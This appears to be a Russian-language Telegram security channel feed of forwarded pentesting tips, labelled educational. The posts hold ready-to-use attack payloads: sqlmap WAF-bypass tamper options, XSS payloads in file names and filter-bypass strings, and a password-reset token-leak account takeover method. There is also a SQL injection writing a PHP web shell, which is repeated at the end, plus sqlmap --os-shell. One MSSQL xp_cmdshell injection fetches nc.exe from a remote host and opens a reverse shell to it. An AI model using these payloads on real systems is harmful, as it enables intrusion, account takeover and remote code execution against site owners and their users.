#Beacon
1.19K subscribers
272 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
Forwarded from SHADOW:Group
​​🖇 Захват аккаунта через утечку токена сброса

Простой способ, который можно попробовать при тестировании веб-приложений:

1 - Настройте Burp на перехват запросов в браузере;
2 - Сделайте запрос на сброс пароля;
3 - Откройте электронное письмо для сброса пароля в отдельном браузере (без Burp) и скопируйте токен сброса;
4 - Попробуйте найти этот токен в истории Burp. Если он там, то вы нашли простой способ захвата учетной записи.

Таким образом, это означает, что вам на самом деле не нужно читать электронное письмо, чтобы сбросить пароль.

Вы можете выполнить сброс пароля любой учетной записи и, поскольку токен утекает в запросах, вы можете сбросить пароль, не имея доступа к почтовому ящику жертвы.

#web #ato
Forwarded from SHADOW:Group
​​👁 Отслеживаем новые уязвимости на сайтах

Приведённый на изображении ниже код еженедельно (период можно изменить) запускает Nuclei для списка целей, а также удаляет повторяющиеся результаты, чтобы отображать только последний, актуальный результат. Если не знаешь, что такое Nuclei, посмотри эту и эту статью

Для работы также требуется httpx и anew

Нет необходимости в Cronjob. Можно запустить в screen на дедике.

#web
Forwarded from SHADOW:Group
Совет

Если вам нужно обойти WAF (брандмауэр веб-приложений), добавьте в sqlmap следующие параметры:

--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned
Forwarded from SHADOW:Group
🖼 XSS в имени файла

Если вы нашли функцию загрузки изображения, попробуйте ввести изображение с полезной нагрузкой XSS (межсайтовый скриптинг) в имени файла, например:

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png


Обратите внимание, что это может работать только в системах на базе UNIX, поскольку специальные символы не принимаются в качестве имени файла в Windows. Однако как отраженный XSS он должен работать повсеместно.

#web
Forwarded from SHADOW:Group
​​📥Что можно получить, если вы загрузили..

Коротко о том, что можно получить при загрузке файлов с разными расширениями на уязвимый сервер.

#web
Forwarded from SHADOW:Group
​​💉 Переход от SQL инъекции к шеллу или бэкдору

▫️Используем команду “into outfile” для записи в файл:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#web
Forwarded from SHADOW:Group
​​📌 Методы обхода XSS фильтров

Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:

▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
<sCRipT>alert(1)</sCRiPt>


▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
<script>%0d%0aalert(1)</script>


▫️Попробуйте двойное кодирование:
%253Cscript%253Ealert(1)%253C%252Fscript%253E


▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
<scr<script>ipt>alert(1);</scr</script>ipt>


▫️Инъекция анкор тега без пробелов:
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">


▫️Попробуйте обойти пробелы с помощью маркера:
<svg•onload=alert(1)>


▫️Попробуйте изменить метод запроса (POST вместо GET):
 GET /?q=xss

POST /
q=xss

#web
Pentesting Web checklist.pdf
581.2 KB
Чеклист по проведению пентестов на web.
Forwarded from Agent69
six2dez.pentest-book.pdf
32.6 MB
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #